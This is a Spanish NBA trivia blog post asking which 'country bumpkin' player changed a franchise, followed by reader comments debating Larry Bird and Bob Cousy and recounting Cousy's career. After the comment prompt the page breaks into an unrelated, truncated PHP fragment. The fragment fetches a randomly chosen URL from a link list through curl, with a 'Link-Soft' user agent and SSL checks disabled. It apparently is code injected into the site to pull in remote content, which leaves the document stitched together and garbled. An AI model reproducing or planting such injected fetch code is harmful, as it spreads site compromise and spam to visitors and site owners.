Trivial #7

25 de September de 2009 por TheDeerHunter

Empezamos a tener la sensación de que hemos mordido hueso con el nivel de conocimiento NBA que demuestran nuestros visitantes. No sólo que no dejáis ni respirar a la pregunta si no que respondéis con seguridad y precisión, sin dar lugar a la disputa. Quien primero llega moja… Muy bien, enhorabuena a los premiados.

Hay que estar muy puesto en el tema para conocer la discografía del rapero Keith Murray, miembro de los Def Squad, junto a Redman y Erick Sermon. Su disco más popular fue “The most beautifullest thing in this world”, en el año 1994. El tema en cuestión pertenecía a su segundo trabajo “Enigma” del 96. En concreto la nº 13 como bien decía Univerzee… No sabemos si este número mágico significó un mal presagio para comenzar por aquellas fechas con los problemas del músico con la justicia y el subsiguiente declive creativo en su carrera.

Más fácil hubiera resultado para algunos de nosotros recordar a World B Free, nacido como Lloyd B. (Bernard) Free, cuyo nombre en realidad nada tiene que ver con el rap de Murray. Algunos lo hemos conocido con los vídeos de la final del 77, la que ganaron los Blazers de Walton a los Sixers del Dr. J. Ya en aquel momento se destapó como un prolífico anotador. Perfectamente se podría pensar que su nombre tenía que ver con la libertad que él sentía para tirarse hasta los zapatos de la comunión.

Jugó en los Sixers, los Clippers (en San Diego), los Warriors, los Cavs e incluso terminó jugando algún partido en Houston, franquicia en la que se retiró. Anotó casi 18.000 puntos en sus 14 años de carrera, sobrepasando alguna temporada los 30 por partido. Podemos asegurar sin temor a equivocarnos que dio muchísimos menos pases de canasta.

La clasificación sigue liderada por Sergio con 3 aciertos, seguido por Héctor, Rojorob y el nuevo contendiente Univerzee todos con 1 acierto.

La siguiente pregunta no será difícil para unos cracks como vosotros, pero será un 3 en 1 (valiendo un punto si acertáis las tres preguntas, como no puede ser de otra manera). Ahí os va:

Dice la leyenda que un célebre jugador referenciado inicialmente como “el paleto del pueblo” fue capaz de cambiar la historia de una franquicia después de haber sido inicialmente despreciado de forma humillante por sus dirigentes...

1.- ¿Qué jugador fue elegido en el nº 1 de su draft?

2.- ¿Qué equipo le eligió a él?

y finalmente,  3.- ¿quien era la estrella de ese equipo antes de que él llegara?

Que comiencen las tortas…

PD: No olvidéis registraros con vuestro correo electrónico… por si necesitáramos ponernos en contacto con vosotros. No os vamos a mandar spam, no os preocupéis…

Comenta

19 comentarios a esta entrada

  1. Héctor dice:
    #1

    A ver si nadie se me adelanta…

    Cuando he leído lo de “paleto del pueblo” enseguida he pensado en Larry Bird, cuyo apodo era The Hick from French Lick (el paleto de French Lick, su pueblo natal). Lo que no tenía tan claro era lo de que los dirigentes de los Celtics lo despreciaran en un principio (creía que Auerbach hizo fuerza para que se incorporara al equipo antes de disputar su último año universitario). Pero bueno, si fuera Larry Bird, las respuestas serían:

    1-El número 1 de ese Draft (1978) fue Mychal Thompson
    2-Larry Bird fue elegido por los Boston Celtics con el número 6
    3-La estrella de los Celtics de la 1979-80 (año rookie de Bird) era Cedric Maxwell, máximo anotador la temporada anterior con 19 puntos por partido.

    Bueno, ahí va mi apuesta. Todo sea que no preguntarais por Larry Bird y la esté metiendo hasta el fondo.

    Un saludo.

      Citar

  2. dsromero dice:
    #2

    Yo también pensaba que se referían a Bird

    1-Mychal Thompson
    2- Celtics
    3- El que más minutos jugo ese año fue Dave Cowens (vamos que es por si cuela 😛 )

      Citar

  3. TheDeerHunter dice:
    #3

    frío, frío…
    (biennnn) XD

      Citar

  4. Héctor dice:
    #4

    Bueno, probaremos de nuevo…

    Creo que el jugador por el que preguntais es Bob Cousy, inicialmente despreciado por Red Auerbach pero que se acabó convirtendo en piedra angular de los Celtics campeones a finales de los 50. Si es así, las respuestas serían:

    1-Charlie Share (Draft de 1950)
    2-Tri-Cities Blackhawks (nº 3)
    3-Ed Macauley (20 puntos y 9 rebotes en la 50-51)

    A ver si esta vez hay suerte…

      Citar

  5. sergio dice:
    #5

    yo diria q es Bob Cousy tambien… pero hare una correccion a la respuesta de HECTOR porque preguntabais por la estrella del equipo antes de que llegara y Bob Cousy y Ed Macauley llegaron en el 50-51 si no me equivoco… asi que quedaria…

    1-Chuck Share1950
    2-Tri-Cities BlackHawks porque Auerbach dijo que preferia pivots… eso contesta a otra pista…
    3- Aqui tengo mis dudas pero dire George Kaftan que es quien mejor lo habia hecho las dos temporadas anteriores

    (espero que haya suerte… )

      Citar

  6. sergio dice:
    #6

    ah! y si vale poner una segunda opcion… apostaremos por Bob Kinney… maximo anotador de los Celtics en la 49-50

      Citar

  7. Héctor dice:
    #7

    Bueno, yo aposté por Macauley porque ya había hecho 16 puntos por partido en la 49-50 con los St. Louis Bombers (que acabaron desapareciendo), así que era más o menos una “estrella” cuando llegó a los Celtics. Aunque claro, si preguntaban por alguien que ya estaba en el equipo te la llevas tú…

    Que los dueños decidan. Un saludo.

      Citar

  8. sergio dice:
    #8

    tambien esty pensando que la pregunta puede referirse a la estrella del equipo que lo eligio en el draft (en este caso los TriCities BlackHawks… entonces quedaria…

    1.-Chuck Share 1950
    2.-TriCities BlackHawks
    3.-Mike Todorovich

      Citar

  9. sergio dice:
    #9

    o Jack Nichols… o Mick Eddleman… si por ser… xD

      Citar

  10. Óscar dice:
    #10

    Yo apostaría como segundón de Héctor también por Mychal Thompson / Celtics (#6 tras ser subcampeón con Indiana State frente a los Spartans de Michigan State de Magic en 1979, creo que la final de NCAA más seguida de la Historia) / Cedric Maxwell.
    Parece que no era la respuesta… ¿Cuál es, por los clavos de Cristo?.

      Citar

  11. Óscar dice:
    #11

    Y por cierto, no olvidéis computar con 0´15 puntos mi respuesta “ténicamente correcta” de Drazen petrovic en el Trivial #2. De esa forma, me situaría en una honrosa 5ª posición jejeje.

      Citar

  12. TheDeerHunter dice:
    #12

    Para no marearos, hay que decir que la respuestá técnicamente está acertada.
    Digo técnicamente porque sois tan buenos que pronto me he dado cuenta que la pregunta no estaba del todo bien formulada…

    Entiendo que el punto ya está dado… pero esa historia de Cousy es cojonuda y os reto a que la terminéis de contar completa… si no es así, ya la completaré yo cuando caiga la siguiente…

    PD: Os debería de haber dejado con el anzuelo de Larry Bird bien mordido…

      Citar

  13. sergio dice:
    #13

    ostia! pue ser que en el draft de 1950 la primera eleccion fuera Paul Arizin por aquello de la Territorial Rule… asi que hagams otro intento que esto es como las quinielas… a mas apuestas mas posibilidades

    Paul Arizin
    Tricities BlackHawks
    George Kaftan
    …Hablo de Bob Cousy claro

      Citar

  14. sergio dice:
    #14

    Contare lo que se sobre Bob Cousy… pero que sepais que me teneis en un sinvivir por no decir quien es xD

    Bob Cousy procedia de una familia pobre de ascendencia francesa que residia en New York (primero Manhattan y luego en Queen’s). En un principio no destacaba en el baloncesto pero una rotura de su brazo derecho originó que siguiera entrenando y desarrollando su brazo izquierdo hasta convertirse en un ambidiestro perfecto (hasta para tirar lo hacia con las dos segun parece)
    Como le pasaría durante gran parte de su vida, al entrar en el equipo universitario fue rechazado por su entrenador que no veia util el baloncesto rapido que practicaba Cousy (no habia reloj de posesion y las jugadas se pretendian alargar lo mas posible buscando la seguridad para anotar)
    A pesar de ser idolatrado por el publico de Boston no fue elegido por Red Auerbach en primer lugar (fue Chuck Share) que lo justifico diciendo “Mi objetivo es ganar, no fichar a los PALETOS de aquí” (aqui sale el famoso paleto), y acabo siendo seleccionado por los TriCities Black Hawks (TriCities porque pertenecia a 3 ciudades en diferentes estados) que lo mandarian directamente a Chicago Stags, franquicia que desapareció sin que llegara a debutar. La NBA realizó una especia de draft de expansion en el que Bob Cousy acabo en…. los Celtics (¬¬) a pesar de que el señor Red ni el principal mando del equipo seguian confiando en el. Lo demas creo que ya lo sabeis todos… se hizo con un puesto y… bueno, realmente se hizo con 6 anillos, 1 MVP de la temporada y dos del All Star (aparte de 13 apariciones), 10 veces en el quinteto ideal y 2 en el segundo…

    I wanna be “paleto”

      Citar

  15. sergio dice:
    #15

    Al final creo que Bob Cousy termino siendo el que mejor se llevaba con el señor Red… porque lo llamaba por su nombre de pila y hasta el presidente Kennedy dio un discurso en su despedida.
    En las Finales del 63 tuvo una actuacion parecida a la de Paul Pierce el año pasado que originó la victoria contra los Lakers a pesar de ir perdiendo.
    Algo que habla bien de este tipo es que jugando con Chuck Cooper (primer jugador afroamericano de la liga) le fue prohibido a este último alojarse en el hotel con el resto del equipo en un viaje que realizaron a North Carolina donde habia mucha discriminacion racial (el mismo estado que vio crecer a Jordan)… ¿que hizo Bob? Irse con el en tren para que no se sintiera discriminado.

      Citar

  16. diestro dice:
    #16

    No se quién se llevara el premio del trivial pero, yo pongo pa un regalo para Sergio jaja. Jugon!!!

      Citar

  17. Héctor dice:
    #17

    Sergio, te estás ganando el minipunto 🙂

      Citar

  18. sergio dice:
    #18

    Que va… aqui lo tiene que ganar el que lo haya dicho bien. Hay que ser honrao’ y tu diste la respuesta antes que yo… aunque ellos decidiran si era la correcta del todo o no xD. Lo de Bob Cousy es por contar algo, ya que lei cosillas sobre el… creo que todo lo que sea aportarnos informacion sobre baloncesto sera bien recibida por el resto no?

      Citar

  19. Héctor dice:
    #19

    Y tanto que es bien recibida 😉

    Por cierto, quiero que nos saquen de dudas ya!!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>